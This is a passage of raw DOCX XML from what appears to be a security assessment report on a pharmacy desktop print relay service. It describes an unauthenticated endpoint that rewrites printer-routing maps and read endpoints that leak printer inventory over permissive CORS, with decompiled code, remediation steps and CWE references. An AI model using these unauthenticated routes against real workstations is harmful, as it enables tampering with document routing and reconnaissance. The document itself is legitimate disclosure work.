        <w:t xml:space="preserve">Vulnerable Variable/String:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>No auth guard; direct File.WriteAllText to PrintDocTypeMapFilePath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B064B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Source (where it comes from):  </w:t>
      </w:r>
      <w:r>
        <w:t>Request body + route (no isUserTokenValid / validationForPrintPdf call anywhere in the action)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD1E6D" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Code Pattern:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1384F166" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFCCCC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>WritePrintDocTypeMapSettings(map);  // -&gt; File.WriteAllText(PrintDocTypeMapFilePath, ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2D9990" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Full Code Snippet (IL-reconstructed):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66691C66" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Reconstructed SetPrintDocTypeMap (decompiled from IL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>EnsurePrintDocTypeMapSettingsExist();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>var map = ReadPrintDocTypeMapSettings();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>if (verb == "DELETE") { /* remove mapping for printDocType */ }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>else                  { /* add or update printDocType -&gt; printQueueName */ }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">WritePrintDocTypeMapSettings(map);   // -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>File.WriteAllText(PrintDocTypeMapFilePath, ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// VULNERABLE: No call to validationForPrintPdf or isUserTokenValid anywhere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// in this action. An unauthenticated caller can re-map any document type to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// any printer queue, or delete mappings to c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ause denial of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69737541" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="0D6636A7" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reconstructed SetPrintDocTypeMap (decompiled from IL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B57B2" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567015E3" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EnsurePrintDocTypeMapSettingsExist();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25049795" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>var map = ReadPrintDocTypeMapSettings();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C37FB1B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>if (verb == "DELETE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>") {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /* remove mapping for printDocType </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>*/ }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4AA91BB1" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>else                  { /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">* add or update printDocType -&gt; printQueueName </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>*/ }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="549829D2" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WritePrintDocTypeMapSettings(map);     // -&gt; File.WriteAllText(PrintDocTypeMapFilePath, ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8932EE" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// No call to validationForPrintPdf or isUserTokenValid anywhere in this action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6673C5E6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027C0910" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Attack Path (Executive View)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B744BA1" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6330D6DB" wp14:editId="63AF7130">
            <wp:extent cx="5943600" cy="41064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exec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4106487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67864EC2" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure M5 — Attack path: with no login required, an attacker rewrites or deletes the map that decides which printer each document type is sent to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26884F35" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="565358DA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568490AA" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: protect the routing map with the same validated login as printing, validate inputs, and record who changed what.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AEB20F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Require authorization on the endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F1BD4B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ensure the corrected [Authorize] + middleware (Finding 3) covers SetPrintDocTypeMap and its DELETE path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F7C9E6" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Validate inputs against an allowlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57096CB9" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Accept only known document types and existing, permitted queue names; reject anything else with 400.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CCBD4" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>if (!KnownDocTypes.Contains(printDocType)) return BadRequest("Unknown document type");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>if (!InstalledQueues.Contains(printQueueName)) return BadRequest("Unknown print queue");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D443697" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 3. Audit every change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEF3000" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Log each create/update/delete with the authenticated principal, timestamp, old value, and new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F112E1E" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>logger.LogInformation("RoutingMap change by {User}: {DocType} {Old} -&gt; {New} at {Time}",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    User.Identity?.Name, printDocType, oldQueue, printQueueName, DateTimeOffset.UtcNow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122FEA0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) an unauthenticated map change returns 401; (2) an unknown queue name is rejected; (3) a valid change appears in the audit log with the user and timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668F3623" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="1F1CB9DA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C12B192" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-862: Missing Authorization — cwe.mitre.org/data/definitions/862.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6432EB8E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-639: Authorization Bypass Through User-Controlled Key — cwe.mitre.org/data/definitions/639.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083854C" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Top 10 2021 A01: Broken Access Control — owasp.org/Top10/A01_2021-Broken_Access_Control/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D7EDE" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299539B8" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67408B99" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1EB3D7" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14524ADE" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D58C95" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACCB132" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F28AFD" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E89BB0" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771B0BF7"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2F52B1AC" w14:textId="77777777" w:rsidTr="002E6C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5518BE59" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="14" w:name="_Toc9000005"/>
            <w:bookmarkStart w:id="15" w:name="_Toc232079915"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>6. Unauthenticated Information Disclosure via Printer Enumeration - Medium</w:t>
            </w:r>
            <w:bookmarkEnd w:id="14"/>
            <w:bookmarkEnd w:id="15"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EC7D31"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="314B42E9"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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1276E2D6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8ECED"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Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 4.3 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D6415A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected component: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PrintController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> read actions (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetPrinterNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, GetPrintersDetail, GetPrinterStatus, GetPrintQueueStatus, GetPrintDocTypeMaps, Ping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D95D9E9" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All read-only endpoints require no authentication and, due to the permissive CORS policy, are readable </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cross</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-origin by any website. They disclose the workstation's installed printers and print queues, detailed per-printer status (a structure exposing more than thirty fields), and the document-type-to-queue mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D58CAD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In a specialty-pharmacy environment, printer and queue names frequently encode site, department, floor, or device identifiers. Exposing this inventory to any website aids reconnaissance, fingerprinting of the workstation's role, and social-engineering, and confirms the presence and port of the relay to an attacker preparing the higher-severity attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038271D6" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E55DFEE" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Code Source Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7C8858" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Binary File:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DesktopPrintRelayService.Host.exe (v1.0.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787A4D5" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">File Location:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C:\Program Files (x86)\Inovalon\DesktopPrintRelayInstaller\DesktopPrintRelayService.Host.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB6BCD" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Namespace:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptMed.DesktopPrintRelayService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF36AF1" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PrintController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745A86B9" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Method:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GetPrinterNames(), GetPrintersDetail(), GetPrintersStatus(), GetPrintDocTypeMaps(), Ping()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF6C0E" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Variable/String:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Read actions with no [Authorize]; exposed via permissive CORS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1130E0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Source (where it comes from):  </w:t>
      </w:r>
      <w:r>
        <w:t>GET routes /printers, /printers/detail, /printers/status, /printers/print-doc-type-maps, /ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418CC868" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Code Pattern:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F11F1D" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
